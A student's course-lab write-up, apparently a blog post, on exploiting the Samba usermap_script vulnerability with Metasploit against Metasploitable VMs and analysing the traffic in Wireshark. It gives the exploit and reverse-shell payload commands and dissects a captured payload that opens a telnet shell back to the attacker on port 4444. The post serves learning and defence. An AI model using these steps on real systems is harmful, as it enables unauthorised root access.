把博客园图标替换成自己的图标
把博客园图标替换成自己的图标end
旋转立方体
旋转立方体end
返回顶部

20211912 2021-2022-2 《网络攻防实践》第七周作业

20211912 2021-2022-2 《网络攻防实践》第七周作业

1 知识点梳理与总结

1.1 Samba 服务

  • 主要用于Linux和Windows系统主机间的文件共享,也可用于Linux和Linux之间的共享文件

1.2 usermap_script

  • 用户名映射脚本,是Samba上的一个漏洞,当使用非默认的用户名映射脚本配置选项时产生,因为未对用户名进行过滤,因此可以通过指定一个包含shell元字符的用户名,执行任意命令,且无认证

1.3 实践内容

2 虚拟机信息

虚拟机 IP地址
Kali 192.168.31.104
Metasploitable_ubuntu 192.168.31.154
Metasploitable_ubuntu 192.168.31.50

3 使用Metasploit进行Linux远程渗透攻击

  • 打开msfconsole,使用命令use exploit/multi/samba/usermap_script使用该模块,再使用命令show payloads查看可以供我们使用的攻击载荷

  • 使用命令set payload cmd/unix/reverse来进行双向连接,

  • 设置好参数(LHOST设置为攻击机的IP地址RHOST设置为靶机的IP地址)并使用命令exploit进行攻击

  • 执行一些简单指令进行验证,发现成功获取到靶机root控制权限,攻击成功

4 攻防对抗实践

  • 和上述过程一样,在使用命令exploit进行攻击前,防守方使用wireshark监听获得的网络数据包

5 windows系统远程渗透攻击和分析

  • 和上述过程一样,在使用命令exploit进行攻击前,防守方使用wireshark监听获得的网络数据包

  • 从数据包中可以得到以下信息:

攻击机 靶机
IP地址:192.168.31.104 IP地址:192.168.31.50
端口: 41821 端口:139
  • 攻击发起时间:从ARP协议的询问开始

  • 由于攻击的是139号端口,由查阅的资料可知139端口是Samba服务端口,由此可知攻击者利用了Samba服务漏洞

  • 从第一个SMB数据包中找到shellcode

  • nohupno hang up的简写,即不挂断地运行命令,退出终端不会影响程序的运行;shLinux中运行shell的命令,是shell的解释器telnet 192.168.31.104 4444表明数据是通过4444号端口传入攻击机的;/dev/null 2>&1意指执行某个命令将不会有任何日志输出

  • 通过追踪TCP流确定攻击机执行的命令,有whoami、ifconfig

6 学习中遇到的问题及解决

  • 问题1:对抓取的数据包中部分指令不了解
  • 问题1解决方案:上网查找资料慢慢进行分析

7 学习感悟、思考

  • 通过上次的实践,本次实践做起来较简单,对wireshark数据包的抓取和分析也更加熟练,继续加油

8 参考资料

posted @ 2022-04-29 08:25  小忽悠yuooo  阅读(62)  评论(0编辑  收藏  举报